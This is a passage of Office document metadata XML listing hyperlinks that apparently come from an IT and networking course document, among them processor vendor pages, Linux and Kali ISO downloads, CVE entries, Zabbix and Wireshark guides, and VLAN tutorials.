      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179725</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>594</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.qualcomm.com/products/processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060975</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>591</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cpu-world.com/CPUs</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>588</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/products/processors/core.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929904</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>585</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.amd.com/en/products/processors-desktop</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4980831</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>582</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://download.fedoraproject.org/pub/alt/releases/33/Labs/x86_64/iso/Fedora-Security-Live-x86_64-33-1.2.iso</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276922</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>579</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-installer-amd64.iso</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589907</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>576</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.slavasoft.com/download.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>84</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>573</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9746</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>65618</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>570</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0597</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>262232</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2035</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>458845</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>564</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7335</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>65625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>561</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8407</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>558</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655436</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>555</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655436</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>552</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276839</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>549</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.redhat.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570647</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>546</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://kb.acronis.com/content/65468</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570647</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>543</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://kb.acronis.com/content/65468</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441794</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>540</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835025</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>537</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7012407</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>534</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570673</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>531</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://repo.zabbix.com/zabbix/5.2/rhel/8/x86_64/zabbix-release-5.2-1.el8.noarch.rpmdnf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5701747</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>528</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://repo.zabbix.com/zabbix/5.0/rhel/8/x86_64/zabbix-release-5.0-1.el8.noarch.rpmdnf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507350</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxhint.com/install_centos8_virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2228328</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>522</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxconfig.org/how-to-install-putty-in-redhat-linux-8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507350</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>519</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxhint.com/install_centos8_virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507350</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>516</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxhint.com/install_centos8_virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441817</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>513</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://thenextweb.com/plugged/2019/12/22/build-pc-tips-computer/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4849670</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>510</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.stonerefurb.co.uk/form-factors-explained</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4522050</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>507</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.lanner-america.com/blog/types-motherboard-form-factors/%23:~:text=The form factor determines the,pico-ATX%2C and further.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7667772</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>504</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://techlog360.com/ddr1-ddr2-ddr3-ddr4-ram-differences/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063328</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>501</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://gadgetsexplorer.com/2019/10/08/whats-the-difference-between-ddr2-ddr3-and-ddr4-ram/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8192102</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>498</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.transcend-info.com/Support/FAQ-296</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=DDR2%20memory%20is%20at%20the,improved%20I%2FO%20bus%20signal.&amp;text=DDR4%20SDRAM%20provides%20the%20lower,2133~3200%20MT%2Fs</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815757</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>495</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179725</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>492</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.qualcomm.com/products/processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060975</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>489</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cpu-world.com/CPUs</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>486</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/products/processors/core.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929904</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>483</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.amd.com/en/products/processors-desktop</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4849691</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>480</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4128823</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>477</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.lifewire.com/wireshark-tutorial-4143298</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949172</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>474</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.wireshark.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274534</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>471</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://networklessons.com/switching/intervlan-routing</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376269</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>468</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274534</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>465</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://networklessons.com/switching/intervlan-routing</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376269</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>462</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1376269</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>459</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422626</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>456</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/configure-vtp-server-and-client-in-switch.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274593</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>453</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-practice-lab-setup-in-packet-tracer.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4456514</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>450</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://lt.phhsnews.com/how-do-ip-addresses-work5759</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114207</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>447</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://tech4fresher.com/best-wifi-analyzer-for-windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094887</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>444</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&amp;hl=en_US&amp;gl=US</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6160469</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>441</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/en-us/p/wifi-analyzer/9nblggh33n0n?activetab=pivot:overviewtab</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966167</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>438</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.freedownloadmanager.org/Windows-PC/Ekahau-HeatMapper-FREE.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177432</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>435</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ekahau.com/solutions/wi-fi-heatmaps/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735612</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>432</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.metageek.com/products/rampart-home/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114178</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>429</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>426</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://app.diagrams.net/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7077920</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>423</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.networkstraining.com/best-network-diagram-software/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359400</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>420</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684706</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>417</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225994</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>414</vt:i4>
      </vt:variant>
      <vt:variant>
